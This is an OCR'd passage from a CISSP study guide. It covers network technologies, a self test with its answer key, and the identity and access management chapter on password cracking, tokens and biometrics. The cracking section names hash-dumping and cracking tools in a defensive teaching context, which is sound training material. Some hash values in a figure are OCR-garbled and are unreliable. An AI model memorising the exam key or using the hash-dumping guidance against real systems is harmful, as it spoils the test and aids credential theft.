complex applications in a centralized environment can be easier to manage. Like- 
wise, developing and maintaining desktops to a security baseline can be easier to 
accomplish when there is one, or even several, central master images that determine 
the settings of each corresponding virtual desktop. 

Screen Scraping 

Screen scraping presents one approach to graphical remote access to systems. 
Screen scraping protocols packetize and transmit information necessary to draw the 
accessed system’s screen on the display of the system being used for remote access. 
VNC (Virtual Network Computing), a commonly used technology for accessing 
remote desktops, is fundamentally a screen scraping style approach to remote access. 
Not all remote access protocols are built as screen scrapers. For example, Microsoft’s 
popular Remote Desktop Protocol (RDP), does not employ screen scraping to 
provide graphical remote access. 

Instant Messaging 

Instant Messaging allows two or more users to communicate with each other via 
real-time “chat.” Chat may be one-to-one, or many-to-many via chat groups. In 
addition to chatting, most modern instant messaging software allows file sharing, and 
sometimes audio and video conferencing. 

An older instant messaging protocol is IRC (Internet Relay Chat), a global net- 
work of chat servers and clients created in 1988 and remaining very popular even 
today. IRC servers use TCP port 6667 by default, but many IRC servers run on non- 
standard ports. IRC can be used for legitimate purposes, but is also used by malware, 
which may “phone home” to a command-and-control channel via IRC (among other 
methods). 

Other chat protocols and networks include AOL Instant Messenger (AIM), ICQ 
(short for “I seek you”), and Extensible Messaging and Presence Protocol (XMPP) 
(formerly known as Jabber). 

Chat software may be subject to various security issues, including remote 
exploitation, and must be patched like any other software. The file sharing capability 
of chat software may allow users to violate policy by distributing sensitive docu- 
ments, and similar issues can be raised by the audio and video sharing capability 
of many of these programs. Organizations should have a policy controlling the use 
of chat software and technical controls in place to monitor and, if necessary, block 
their usage. 
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Remote Meeting Technology 

Remote meeting technology is a newer technology that allows users to conduct online 
meetings via the Internet, including desktop sharing functionality. Two commercial 
remote meeting solutions are “GoToMeeting” by Citrix Systems, and Microsoft 
Office Live Meeting. These technologies usually include displaying PowerPoint 
slides on all PCs connected to a meeting, sharing documents such as spreadsheets, 
and sometimes sharing audio or video. Some solutions allow users to remotely 
control another connected PC. 

Many of these solutions are designed to tunnel through outbound SSL or TLS 
traffic, which can often pass via firewalls and any Web proxies. If a site’s remote 
access policy requires an IPsec VPN connection using strong authentication to allow 
remote control of an internal PC, these solutions may bypass existing controls (such 
as a requirement for strong authentication) and violate policy. Usage of remote meet- 
ing technologies should be understood, controlled, and compliant with all applicable 
policy. 

PDAs 

Personal Digital Assistants (PDAs) are small networked computers that can fit in the 
palm of your hand. PDAs have evolved over the years, beginning with first-genera- 
tion devices such as the Apple Newton (Apple coined the term "PDA”) and Palm Pi- 
lot. They offered features such as calendar and note-taking capability. PDA operating 
systems include Apple iOS, Windows Mobile, Blackberry, and Google’s Android, 
among others. 

PDAs have become increasingly networked, offering 802.11 and in some cases 
cellular networking. PDAs have become so powerful that they are sometimes used 
as desktop or laptop replacements. Note that the term “PDA” has become dated 
(“mobile device” is more common), but is still used on the exam. 

Some devices, such as the Apple iPod, remain dedicated PDAs (with audio and 
video capability). Most PDAs have converged with cell phones into devices called 
smart phones (such as the Apple iPhone and Blackberry smart phones). 

Two major issues regarding PDA security are loss of data due to theft or loss of 
the device, and wireless security. Sensitive data on PDAs should be encrypted, or the 
device itself should store minimal amount of data. A PIN should be used to lock the 
device, and the device offering remote wipe capability (the ability to remotely erase 
the device in case of loss or theft) is an important control. 

PDAs should use secure wireless connections. If Bluetooth is used, sensitive 
devices should have automatic discovery disabled, and owners should consider the 
Bluetooth risks discussed in the previous section. 

Wireless Application Protocol 

The Wireless Application Protocol (WAP) was designed to provide secure Web ser- 
vices to handheld wireless devices such as smart phones. WAP is based on HTML, 
and includes HDML (Handheld Device Markup Language). Authentication is pro- 
vided by Wireless Transport Layer Security (WTLS), which is based on TLS. 
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A WAP browser is a microbrowser, simpler than a full Web browser, and requir- 
ing fewer resources. It connects to a WAP gateway, which is a proxy server designed 
to translate Web pages. The microbrowser accesses sites written (or converted to) 
WML (Wireless Markup Language), which is based on XML. 


NOTE 

WAP is an overloaded acronym, mapping to multiple technologies and protocols. It is especially 
confusing in regards to wireless: WAP may stand for Wireless Access Point or Wireless Application 
Protocol. And WPA (Wi-Fi Protected Access) has the same letters in different order. 

Do not confuse these wireless protocols and technologies: the exam will be clear on which a 
question may refer to: do not rush through a question and miss the context. Also do not confuse 
802.1 1 wireless security standards (including WEP and 802.1 li/WPA2) with handheld device WAP 
security (WTLS). 


Content Distribution Networks 

Content Distribution Networks (CDN, also called Content Delivery Networks) use a 
series of distributed caching servers to improve performance and lower the latency of 
downloaded online content. They automatically determine the servers closest to end 
users, so users download content from the fastest and closest servers on the Internet. 
Examples include Akamai, Amazon CloudFront, CloudFlare and Microsoft Azure. 

CDNs also increase availability and can reduce the effects of denial of service 
attacks: “While content delivery networks also solve ancillary problems such 
as improving global availability and reducing bandwidth, the main problem they 
address is latency: the amount of time it takes for the host server to receive, process, 
and deliver on a request for a page resource (images, CSS files, etc.). Latency 
depends largely on how far away the user is from the server, and it’s compounded by 
the number of resources a web page contains. 

For example, if all your resources are hosted in San Francisco, and a user is 
visiting your page in London, then each request has to make a long round trip from 
London to SF and back to London. If your web page contains 100 objects (which is at 
the low end of normal), then your user’s browser has to make 100 individual requests 
to your server in order to retrieve those objects. 

Typically, latency is in the 75-140ms range, but it can be significantly higher, 
especially for mobile users accessing a site over a 3G network. This can easily add 
up to 2 or 3 seconds of load time, which is a big deal when you consider that this is 
just one factor among many that can slow down your pages. [11] 


SUMMARY OF EXAM OBJECTIVES 

Communication and Network Security is a large and complex domain, requiring 
broad and sometimes deep understanding of thorny technical issues. Our modern 
world relies on networks, and those networks must be kept secure. It is important to 
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not only understand why we use concepts like packet-switched networks and the OSI 
model, but also how we implement those concepts. 

Older Internet-connected networks often had a single dual-homed host con- 
nected to the Internet. We have seen how networks have evolved to screened host 
networks via the addition of a router to screened subnet via the use of DMZs. Fire- 
walls were created, and then evolved from packet filter to stateful. Our physical 
design evolved from buses to stars, providing fault tolerance and hardware isolation. 
We have evolved from hubs to switches that provide traffic isolation. We have added 
detective devices such as HIDS and NIDS and preventive devices such as HIPS and 
NIPS. We have deployed secure protocols such as TLS and IPsec. 

We have improved our network defense-in-depth every step of the way, and 
increased the confidentiality, integrity, and availability of our network data. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . Which protocol should be used for an audio streaming server, where some loss 
is acceptable? 

A. IP 

B. ICMP 

C. TCP 

D. UDP 

2. What network technology uses fixed-length cells to carry data? 

A. ARCNET 

B. ATM 

C. Ethernet 

D. FDDI 

3. Secure Shell (SSH) servers listen on what port and protocol? 

A. TCP port 20 

B. TCP port 21 

C. TCP port 22 

D. TCP port 23 

4. What network cable type can transmit the most data at the longest distance? 

A. Coaxial 

B. FiberOptic 

C. Shielded Twisted Pair (STP) 

D. Unshielded Twisted Pair (UTP) 
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5 . Which device operates at Layer 2 of the OSI model? 

A. Hub 

B. Firewall 

C. Switch 

D. Router 

6 . What are the names of the OSI model, in order from bottom to top? 

A. Physical, Data Link, Transport, Network, Session, Presentation, Application 

B. Physical, Network, Data Link, Transport, Session, Presentation, Application 

C. Physical, Data Link, Network, Transport, Session, Presentation, Application 

D. Physical, Data Link, Network, Transport, Presentation, Session, Application 

7 . Which of the following authentication protocols uses a three-way 
authentication handshake? 

A. CHAP 

B. EAP 

C. Kerberos 

D. PAP 

8. Restricting Bluetooth device discovery relies on the secrecy of what? 

A. MAC Address 

B. Symmetric key 

C. Private Key 

D. Public Key 

9 . Which wireless security protocol is also known as the RSN (Robust Security 
Network), and implements the full 802. lli standard? 

A. AES 

B. WEP 

C. WPA 

D. WPA2 

1 0. Which endpoint security technique is the most likely to prevent a previously 
unknown attack from being successful? 

A. Signature-based antivirus 

B. Host Intrusion Detection Systems (HIDS) 

C. Application Whitelisting 

D. Perimeter firewall 

1 1 . Which transmission mode is supported by both HDLC and SDLC? 

A. Asynchronous Balanced Mode (ABM) 

B. Asynchronous Response Mode (ARM) 

C. Normal Balanced Mode (NBM) 

D. Normal Response Mode (NRM) 

1 2. What is the most secure type of EAP? 

A. EAP-TLS 

B. EAP-TTLS 

C. LEAP 

D. PEAP 
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1 3. What WAN Protocol has no error recovery, relying on higher-level protocols to 
provide reliability? 

A. ATM 

B. Frame Relay 

C. SMDS 

D. X.25 

1 4. What is the most secure type of firewall? 

A. Packet Filter 

B. Stateful Firewall 

C. Circuit-level Proxy Firewall 

D. Application-layer Proxy Firewall 

1 5. Accessing an IPv6 network via an IPv4 network is called what? 

A. CIDR 

B. NAT 

C. Translation 

D. Tunneling 


SELF TEST QUICK ANSWER KEY 


1 . 

D 

2. 

B 

3. 

C 

4. 

B 

5. 

C 

6. 

C 

7. 

A 

8 . 

A 

9. 

D 

10 . 

C 

11. 

D 

12 . 

A 

13. 

B 

14. 

D 

15. 

D 
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CHAPTER 


Domain 5: Identity and 
Access Management 
(Controlling Access and 
Managing Identity) 



EXAM OBJECTIVES IN THIS CHAPTER 

• Authentication Methods 

• Access Control Technologies 

• Access Control Models 


UNIQUE TERMS AND DEFINITIONS 

• Crossover Error Rate (CER) - describes the point where the False Reject Rate 
(FRR) and False Accept Rate (FAR) are equal. 

• Discretionary Access Control (DAC) - gives subjects full control of objects they 
have created or been given access to, including sharing the objects with other 
subjects 

• False Accept Rate (FAR) - occurs when an unauthorized subject is accepted by 
the biometric system as valid. Also called a Type II error. 

• False Reject Rate (FRR) - occurs when an authorized subject is rejected by the 
biometric system as unauthorized. Also called a Type I error. 

• Mandatory Access Control (MAC) - system-enforced access control based on 
subject’s clearances and object’s labels 

• Role-Based Access Controls (RBAC) - subjects are grouped into roles and each 
defined role has access permissions based upon the role, not the individual 


INTRODUCTION 

Identity and Access Management (also known as access control) is the basis for all 
security disciplines, not just IT security. The purpose of access management is to 
allow authorized users access to appropriate data and deny access to unauthorized 
users. Seems simple, right? It would be easy to completely lock a system down to 
allow just predefined actions with no room for leeway. In fact, many organizations, 
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including the U.S. Military, are doing just that; restricting the access users have to 
systems to a very small functional capability. 

However, with increasing dependence on the Internet to perform work, systems 
must be flexible enough to be able to run a wide variety of software that is not cen- 
trally controlled. 

Another concern that impacts access control is the dependence on antiquated 
(also known as “legacy”) software applications. Large IT infrastructures (such as the 
U.S. Military) may run mission-dependent applications that are over 10 years old! 
The cost of replacing these legacy applications is often too large for the organization 
to complete in one funding cycle. IT professionals must often manage security while 
running insecure legacy applications that introduce access control risks. 

One thing is certain: with the dependence on IT as a means of doing business, and 
Identity and Access Management as one of the first lines of defense, understanding 
how to properly implement access management has become vital in the quest for 
secure communications. 

Access controls protect against threats such as unauthorized access, inappropri- 
ate modification of data, and loss of confidentiality. Access control is performed by 
implementing strong technical, physical, and administrative measures. This chapter 
focuses on the technical and administrative aspects of access control; we discussed 
physical security in Chapter 4, Domain 3: Security Engineering. Remember that 
physical security is implicit in most other security controls, including access control. 


AUTHENTICATION METHODS 

A key concept for implementing any type of access control is controlling the proper 
authentication of subjects within the IT system. A subject first identifies his or her 
self; this identification cannot be trusted by itself. The subject then authenticates by 
providing an assurance that the claimed identity is valid. A credential set is the term 
used for the combination of both the identification and authentication of a user. 

There are three basic authentication methods: Type 1 (something you know), 
Type 2 (something you have), and Type 3 (something you are). A fourth type of 
authentication is some place you are. 

TYPE 1 AUTHENTICATION: SOMETHING YOU KNOW 

Type 1 Authentication (something you know) requires testing the subject with some 
sort of challenge and response where the subject must respond with a knowledgeable 
answer. The subject is granted access on the basis of something they know, such as a 
password or PIN (Personal Identification Number - a number-based password). This 
is the easiest, and often weakest, form of authentication. 

Passwords 

Passwords have been the cornerstone for access control to IT systems. They are rela- 
tively easy and cheap to implement. Many online banking, stock portfolio services, 
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private Web mail, and healthcare systems still use a user name and password as the 
access control method. 

There are four types of passwords to consider when implementing access con- 
trols: static passwords, passphrases, one-time passwords, and dynamic passwords. 

Static passwords are reusable passwords that may or may not expire. They are 
typically user-generated and work best when combined with another authentication 
type, such as a smart card or biometric control. 

Passphrases are long static passwords, comprised of words in a phrase or sen- 
tence. An example of a passphrase is: “I will pass the CISSP® in 6 months!” Pass- 
phrases may be made stronger by using nonsense words (replacing CISSP® with 
“XYZZY” in the previous passphrase, for example), by mixing case, and by using 
additional numbers and symbols. 

Passphrases usually have less randomness per character compared to shorter 
complex passwords (such as “B$%Jiu*!”), but make up for the lack of randomness 
with length. Most people find passphrases easier to type and remember than shorter 
complex passwords: we are used to typing sentences. Passphrases offer a reasonable 
tradeoff between security and ease of use: many users may be tempted to write down 
highly complex passwords, but can remember passphrases. Any static password is 
inherently limited, regardless of length or complexity: it may be stolen and reused. 

One-time passwords may be used for a single authentication. They are very 
secure but difficult to manage. A one-time password is impossible to reuse and is 
valid for just one-time use. 

Dynamic passwords change at regular intervals. RSA Security makes a synchro- 
nous token device called SecurlD that generates a new token code every 60 seconds. 
The user combines their static PIN with the RSA dynamic token code to create one 
dynamic password that changes every time it is used. One drawback when using 
dynamic passwords is the expense of the tokens themselves. 

Strong authentication (also called multifactor authentication) requires that the 
user present more than one authentication factor. For example, a user may possess an 
ATM card in order to withdraw money out of the bank, but he/she must also input the 
correct PIN. This prevents many types of attacks including a simple replay attack. In 
a replay attack, the attacker may have access to the PIN, but without the actual ATM 
card, they would not be able to withdraw the money. Likewise, the same logic can be 
used if the attacker copied the ATM card but did not have access to the PIN. 

Password Guessing 

Password guessing is an online technique that involves attempting to authenticate a 
particular user to the system. As we will learn in the next section: Password cracking 
refers to an offline technique in which the attacker has gained access to the pass- 
word hashes or database. Note that most web-based attacks on passwords are of the 
password guessing variety, so web applications should be designed with this in mind 
from a detective and preventive standpoint. 

Password guessing may be detected by monitoring the failed login system logs. 
Clipping levels are used to differentiate between malicious attacks and normal users 
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accidentally mistyping their passwords. Clipping levels define a minimum reporting 
threshold level. Using the password guessing example, a clipping level might be 
established such that the audit system only alerts if failed authentication occurs more 
frequently than five times in an hour for a particular user. Clipping levels can help to 
differentiate the attacks from noise, however they can also cause false negatives if the 
attackers can glean the threshold beneath which they must operate. 

Preventing successful password guessing attacks is typically done with account 
lockouts. Account lockouts are used to prevent an attacker from being able to simply 
guess the correct password by attempting a large number of potential passwords. 
Some organizations require manual remediation of locked accounts, usually in the 
form of intervention by the help desk. However, some organizations configure 
account lockouts to simply have an automatic reset time, which would not necessarily 
require manual intervention. Care should be taken in the account lockout configura- 
tion: an attacker (though unsuccessful at guessing a correct password) might cause 
significant administrative burden by intentionally locking out a large volume of 
accounts. 

Password Hashes and Password Cracking 

In most cases, clear text passwords are not stored within an IT system; only the 
hashed outputs of those passwords are stored. Hashing is one-way encryption us- 
ing an algorithm and no key. When a user attempts to log in, the password they type 
(sometimes combined with a salt, as we will discuss shortly) is hashed, and that hash 
is compared against the hash stored on the system. The hash function cannot be re- 
versed: it is impossible to reverse the algorithm and produce a password from a hash. 
While hashes may not be reversed, an attacker may run the hash algorithm forward 
many times, selecting various possible passwords, and comparing the output to a 
desired hash, hoping to find a match (and therefore deriving the original password). 
This is called password cracking. 

Password hashes for modern UNIX/Linux systems are stored in/etc/shadow 
(which is typically readable only by the root user). Windows systems store hashes 
both on the local machine and on the domain controller (DC) in what is called the 
security account management file or SAM file. The password hashes must be 
accessed in order to authenticate. If a Microsoft Windows system cannot access the 
DC, then it may revert to the locally stored password hashes stored within the work- 
station itself. If a user is running a stand-alone system, typical of most home users, 
then only local password hashes are used. 

Password hashes may also be sniffed on networks or read from memory. The SAM 
file is locked while the Windows operating system is running: tools such as fgdump 
by foofus.net (http://www.foofus.net/fizzgig/fgdump/) and Metasploit’s (http://www. 
metasploit.com) ‘hashdump’ command can dump the hashes from memory. 

Notice the difference in the originating text to hash field entries for Figures 6.1 
and 6.2, generated with the Cain & Abel hash calculator (see http://www.oxid.it/ 
cain.html). The only difference between the two entries is that the “P” in password 
is capitalized in Figure 6.2. 
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Hash Calculator 
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Type 


MD2 

MD4 

MD5 

SHA-1 

SHA-2 (256) 
SHA-2 (384) 
SHA-2 (51 2) 
RIPEMD-160 
LM 
NT 

MySQL323 
MySQLSHAI 
Cisco PIX 
VNC Hash 


Hash 

F03881A88C6E39135F0ECC60EFD609B9 
8A9D093F1 4F8701 DF1 7732B2BB182C74 
5F4DCC3B 5AA765D 61 D8327DEB882CF99 
5BAA61 E4C9B93F3F0682250B6CF8331 B7EE68FD8 

5E884898DA280471 51 D0E56F8DC6292773603D0D64ABBDD62A1 1 EF721 D1 542C 
A8B64BABDQACA91A59BDBB7761B421D4F2BB38280D3A75BA0F21 F2BEBC4558 
B109F3BBBC244EB82441 91 7ED06D618B9008DD09B3BEFD1B5E07394C706A8BE 
2C08E8F588475QA7B99F6F2F342FC638DB25FF31 
E52CAC6741 9A9A22 

8846F7EAEE8FB1 1 7AD06BDD830B7586C 
5D2E19393CC5EF67 

2470C0C06DEE42FD1618BB 99005AD CA2E C9D 1 E 1 9 

N uLKvvWG g. x9H E KO 

DBD83CFD727A1458 



FIGURE 6.1 “password” Hash Output 


As you can see from all the hashing algorithms in Figure 6.1 compared to 
Figure 6.2, most hashes completely change when the input has changed (LM or Mi- 
crosoft LanMan is an exception: LM passwords are converted to upper case before 
hashing, and therefore case sensitivity is irrelevant). When law enforcement is con- 
ducting an investigation into a computer crime and they need to collect evidence 
from a suspected hard drive, before any examination can occur, the hard drive is 
hashed. By hashing the entire hard drive and then copying the data from it, the law 
enforcement officer can testify in court that the data examined has integrity: it is the 
same as the data on the original suspected hard drive. The way this is proven in court 
is by showing the hashes for both the original and copy are the same. If copied data 
objects are hashed and the hashes are the same as the original data object, then the 
originating data is also the same. 

Dictionary Attacks 

A dictionm-y attack uses a word list: a predefined list of words, and each word in the list 
is hashed. If the cracking software matches the hash output from the dictionary attack 
to the password hash, the attacker has successfully identified the original password. 
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FIGURE 6.2 “Password” Hash Output 


NOTE 

Attackers will often tune their dictionary to their target, adding a Spanish dictionary to their 
word list for a target organization with Spanish speakers, or even a Klingon dictionary for an 
organization with Star Trek fans. Packet Storm Security maintains multiple dictionaries at: 

http : //packetstormsecurity . org/Crackers/wordlists/. 


Because a dictionary attack can be done quickly, many organizations require 
users to create passwords that have a special character, number, capital letter, 
and be eight characters or greater. Figure 6.3 shows the SAM file output from 
a Windows workstation within the password cracker application, Cain & Abel 
by Oxid IT (http://www.oxid.it/cain). Notice that Cain & Abel has cracked user 
deckard’s password with a dictionary attack: his password is “replicant,” shown 
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FIGURE 6.3 LM and NT Hashes 


as “REPLICANT” as the LM hash, which ignores case. The tool can also deter- 
mine whether or not an account is missing a password (in this case, the Guest 
account). Access to the SAM file (Windows) and shadow file (UNIX/Linux) 
should be restricted. 

Brute Force and Hybrid Attacks 

Brute-force attacks take more time, but are more effective. The attacker calculates 
the hash outputs for every possible password. Just a few years ago, basic computer 
speed was still slow enough to make this a daunting task. However, with the advances 
in CPU speeds and parallel computing, the time required to brute-force complex 
passwords has been considerably reduced. 

Another recent password cracking breakthrough is the leveraging of GPUs 
(Graphical Processing Units) to crack passwords: “Designed to handle the ever- 
growing demands of computer games, today’s top GPUs can process information at 
the rate of nearly two teraflops (a teraflop is a trillion floating-point operations per 
second). To put that in perspective, in the year 2000 the world’s fastest supercom- 
puter, a cluster of linked machines costing $110 million, operated at slightly more 
than seven teraflops. Graphics processing units are so fast because they’re designed 
as parallel computers. In parallel computing, a given problem is divided among mul- 
tiple processing units, called cores, and these multiple cores tackle different parts of 
the problem simultaneously.” [1] 

An attacker may also use a rainbow table for their password attack. A rainbow 
table acts as a database that contains the pre-computed hashed output for most or all 
possible passwords. Rainbow tables take a considerable amount of time to generate 
and are not always complete: they may not include all possible password/hash com- 
binations. Though rainbow tables act as a database, they are more complex under 
the hood, relying on a time/memory tradeoff to represent and recover passwords and 
hashes. We discuss the technical details of rainbow tables in more detail in Chapter 4, 
Domain 3: Security Engineering. 
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NOTE 

The efficiency of pre-computation brute force attacks leveraging rainbow tables is dependent upon 
the password hashing algorithm’s implementation. The main feature that determines whether 
rainbow tables will greatly increase the speed of password recovery is whether the implementation 
of the algorithm involves salts, which is simply a way of introducing randomness into the resultant 
hashes. In the absence of salts, the same password will yield the exact same hash every single 
time. Notably, Windows’ LM and NT hashes do not include salts, which makes them particularly 
vulnerable to this type of brute forcing. Linux and UNIX systems have employed salts for decades. 
An older UNIX/Linux system using 16 bit salts would require an attacker to create 65,536 separate 
sets of rainbow tables, one set for each possible salt. A modern UNIX/Linux system using SHA-512 
hashes supports 8-character base64 salts. That allows 6 octodecillion (a decimal number with 58 
digits) different salts. 


A hybrid attack appends, prepends, or changes characters in words from a 
dictionary before hashing, to attempt the fastest crack of complex passwords. 
For example, an attacker may have a dictionary of potential system administrator 
passwords but also replaces each letter “o” with the number “0”. Targets of hy- 
brid attacks can have complex passwords cracked if their passwords resemble any 
type of standard 8- 15 -character word with just a few changes in text with special 
characters. 

Salts 

A salt allows one password to hash multiple ways. Some systems (like modern 
UNIX/Linux systems) combine a salt with a password before hashing. While storing 
password hashes is superior to storing plaintext passwords, “The designers of the 
UNIX operating system improved on this method (hashing) by using a random value 
called a ‘salt.’ A salt value ensures that the same password will encrypt differently 
when used by different users. This method offers the advantage that an attacker must 
encrypt the same word multiple times (once for each salt or user) in order to mount a 
successful password-guessing attack.” [2] 

This makes rainbow tables far less effective (if not completely ineffective) for 
systems using salts. Instead of compiling one rainbow table for a system that does 
not use salts, such as Microsoft LAN Manager (LM) hashes, thousands, millions, 
billions or more rainbow tables would be required for systems using salts, depending 
on the salt length. 

Password Management 

Figure 6.4 shows a screen shot from a Windows 10 local security password settings 
policy detailing the password requirements setting for the system. Notice the system 
is configured for the minimum security recommended by both the U.S. Department 
of Defense and Microsoft. 

Managing passwords in a Microsoft Windows environment is fairly straightfor- 
ward. The IT or InfoSec staff determine the organizational policy and implement 
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FIGURE 6.4 Windows 10 Password Settings 


that policy through the DC. Typically, the minimum password management security 
features include the following: 

• Password history = set to remember 24 passwords 

• Maximum password age = 90 days 

• Minimum password age = 2 days (this is because users do not cycle through 24 
passwords to return immediately to their favorite) 

• Minimum password length = 8 characters 

• Passwords must meet complexity requirements = true 

• Store password using reversible encryption = false 

These are the minimum password security controls for the U.S. Department 
of Defense and the Microsoft community has adopted it as the baseline password 
complexity standard [3], The difficulties come when users do not properly create or 
secure the passwords they choose. For example, it is not uncommon for users to write 
down passwords and store them within wallets, address books, cell phones, and even 
sticky notes posted on their monitors. 

Password Control 

Controlling passwords is a concern for management as well as the IT security pro- 
fessional. One problem is complex passwords are harder to remember, which can 
lead to other security issues. Users who write passwords down and leave them in an 
insecure place (such as under a keyboard or stored in a wallet, purse, or rolodex) can 
undermine the entire security posture of a system. 

TYPE 2 AUTHENTICATION: SOMETHING YOU HAVE 

Type 2 authentication (something you have) requires that users possess something, such 
as a token, which proves they are an authenticated user. A token is an object that helps 
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prove an identity claim. The simplest example of a token is a set of car keys. Possessing 
the car keys means one has access to the car. Other examples of tokens include credit 
cards, bank ATM cards, smartcards, and paper documents. ATM cards also use a PIN 
to access a user’s bank account, increasing the overall security of the user’s account. 

Synchronous Dynamic Token 

Synchronous dynamic tokens use time or counters to synchronize a displayed token 
code with the code expected by the authentication server: the codes are synchronized. 

Time -based synchronous dynamic tokens display dynamic token codes that change 
frequently, such as every 60 seconds. The dynamic code is only good during that win- 
dow. The authentication server knows the serial number of each authorized token, the 
user it is associated with, and the time. It can predict the dynamic code on each token 
using these three pieces of information. RSA SecurlD is an example of a hardware- 
based synchronous dynamic token. Google Authenticator, shown in Figure 6.5, is an 
example of a software-based synchronous dynamic token (also called a soft token). 


Carrier 9 2:31 PM 


= Authenticator 

✓ 


551 664 

user@example.com ^ 



FIGURE 6.5 Google Authenticator [4] 
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Counter-based synchronous dynamic tokens use a simple counter: the authenti- 
cation server expects token code 1, and the user’s token displays the same code 1. 
Once used, the token displays the second code, and the server also expects token 
code 2. 

In both cases, users typically authenticate by typing their username, their PIN 
or password (something they know), and the dynamic token code (something they 
have). This method uses strong authentication: the token is useless without the PIN, 
and the PIN is useless without the token. 

Asynchronous Dynamic Token 

Asynchronous dynamic tokens are not synchronized with a central server. The most 
common variety is challenge-response tokens. Challenge-response token authenti- 
cation systems produce a challenge, or input for the token device. Then the user 
manually enters the information into the device along with their PIN, and the device 
produces an output. This output is then sent to the system. The system is assured 
that the user is authenticated because the response is tied to the challenge, a specific 
token, the encryption algorithm used by the token, and the user’s PIN. 

Figure 6.6 shows authentication using a challenge-response token. This also illus- 
trates strong authentication: the user must provide something they know along with 
a token (something they have) in order to gain access. 

Combining access control types is recommended and can provide greater security 
for access control. Using more than one type of access control is referred to as strong 
authentication or multifactor authentication. 


server 



Smart Card 2 - System sends challenge to user 

3 - User enters PIN and challenge; token 
generates response, which is sent to the 
server 

FIGURE 6.6 Asynchronous Challenge-Response 
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TYPE 3 AUTHENTICATION: SOMETHING YOU ARE 

Type 3 authentication (something you are) is biometrics, which uses physical char- 
acteristics as a means of identification or authentication. The term “biometric” 
derives from the Greek words “bios” (life) and “metric” (measurement). Biometrics 
may be used to establish an identity, or to authenticate (prove an identity claim). 
For example: an airport facial recognition system may be used to establish the 
identity of a known terrorist, and a fingerprint scanner may be used to authenticate 
the identity of a subject (who makes the identity claim, and then swipes his/her 
finger to prove it). 

Because biometrics is associated with the physical traits of an individual, it is 
more difficult for that individual to forget, misplace, or otherwise lose control of that 
access capability. Biometrics may be used to provide robust authentication, but care 
should be given to ensure appropriate accuracy and to address any privacy issues that 
may arise as a result. 

Biometrics should be reliable, and resistant to counterfeiting. The data storage 
required to represent biometric information (called the template or the file size) 
should be relatively small (it will be accessed upon every authentication): 1000 bytes 
or less is typical (much less for some systems, like hand geometry). 

Biometric Fairness, Psychological Comfort and Safety 

Biometrics should not cause undue psychological stress to subjects, and should not 
introduce unwarranted privacy issues. Some biometric controls, such as retina scans 
as we will see shortly, are rarely used, for this reason. 

Biometric controls must be usable by all staff, or compensating controls must 
exist. In a large organization (10,000 or more employees), some staff may not have 
fingerprints, or eyes, etc. These issues must be considered, and fair controls must 
exist for all staff. 

Notice that modern airports often have bathrooms with no doors? Entrance is 
now typically via a short corridor with multiple turns (which block open view from a 
concourse into the bathroom). This is done to avoid multiple people touching a door 
handle (and possibly spreading disease). Most airport toilets now flush automatically 
for the same reason. 

Potential exchange of bodily fluid is a serious negative for any biometric 
control: this includes retina scans (where a user typically presses their eye against 
an eyecup), and even fingerprint scanning (where many subjects touch the same 
scanner). Fully passive controls, such as iris scans, may be preferable (there is no 
exchange of bodily fluid). 

Biometric Enrollment and Throughput 

Enrollment describes the process of registering with a biometric system: creating an 
account for the first time. Users typically provide their username (identity), a pass- 
word or PIN, and then provide biometric information, such as swiping fingerprints 
on a fingerprint reader, or having a photograph taken of their irises. Enrollment is a 
one-time process that should take 2 minutes or less. 
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Throughput describes the process of authenticating to a biometric system. This is 
also called the biometric system response time. A typical throughput is 6-10 seconds. 

Accuracy of Biometric Systems 

The accuracy of biometric systems should be considered before implementing a bio- 
metric control program. Three metrics are used to judge biometric accuracy: the False 
Reject Rate (FRR), the. False Accept Rate (FAR), and the Crossover Error Rate (CER). 

False Reject Rate (FRR) 

A false rejection occurs when an authorized subject is rejected by the biometric sys- 
tem as unauthorized. False rejections are also called a Type I error. False rejections 
cause frustration of the authorized users, reduction in work due to poor access condi- 
tions, and expenditure of resources to revalidate authorized users. 

False Accept Rate (FAR) 

A false acceptance occurs when an unauthorized subject is accepted as valid. If an 
organization’s biometric control is producing a lot of false rejections, the overall 
control might have to lower the accuracy of the system by lessening the amount of 
data it collects when authenticating subjects. When the data points are lowered, the 
organization risks an increase in the false acceptance rate. The organization risks an 
unauthorized user gaining access. This type of error is also called a Type II error. 


NOTE 

A false accept is worse than a false reject: most organizations would prefer to reject authentic 
subjects to accepting impostors. FARs (Type II errors) are worse than FRRs (Type I errors). Two is 
greater than one, which will help you remember that FAR is Type II, which are worse than Type I 
(FRRs). 


Over 40 data points are usually collected and compared in a typical fingerprint 
scan. The accuracy of the system may be lowered by collecting fewer minutiae points 
(ten or so). This will lower the FRR, but raise the FAR. It also increases the possibil- 
ity that a user’s fingerprints would be easier to counterfeit. 

Crossover Error Rate (CER) 

The Crossover Error Rate (CER) describes the point where the False Reject Rate (FRR) 
and False Accept Rate (FAR) are equal. CER is also known as the Equal Error Rate 
(EER). The Crossover Error Rate describes the overall accuracy of a biometric system. 

As the sensitivity of a biometric system increases, FRRs will rise and FARs 
will drop. Conversely, as the sensitivity is lowered, FRRs will drop and FARs will 
rise. Figure 6.7 shows a graph depicting the FAR versus the FRR. The CER is the 
intersection of both lines of the graph as shown in Figure 6.7, based on the 2007 
ISACA Biometric Auditing guide, #G36. [5] 
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Sensitivity 

FIGURE 6.7 Crossover Error Rate 


Types of Biometric Controls 

There are a number of biometric controls used today. Below are the major imple- 
mentations and their specific pros and cons with regards to access control security. 

Fingerprints 

Fingerprints are the most widely used biometric control available today. Smartcards 
can carry fingerprint information. Many U.S. Government office buildings rely on 
fingerprint authentication for physical access to the facility. Examples include smart 
keyboards, which require users to present a fingerprint to unlock the computer’s 
screen saver. 

The data used for storing each person’s fingerprint must be of a small enough size 
to be used for authentication. This data is a mathematical representation of finger- 
print minutiae, specific details of fingerprint friction ridges, which include whorls, 
ridges, bifurcation, and others. Figure 6.8 shows minutiae types (from left) bifurca- 
tion, ridge ending, core and delta [6], 

Retina Scan 

A retina scan is a laser scan of the capillaries that feed the retina of the back of the 
eye. This can seem personally intrusive because the light beam must directly enter 
the pupil, and the user usually needs to press their eye up to a laser scanner eyecup. 
The laser scan maps the blood vessels of the retina. Health information of the user 
can be gained through a retina scan: conditions such as pregnancy and diabetes can 
be determined, which may raise legitimate privacy issues. Because of the need for 
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close proximity of the scanner in a retina scan, exchange of bodily fluids is possible 
when using retina scanning as a means of access control. 


EXAM WARNING 


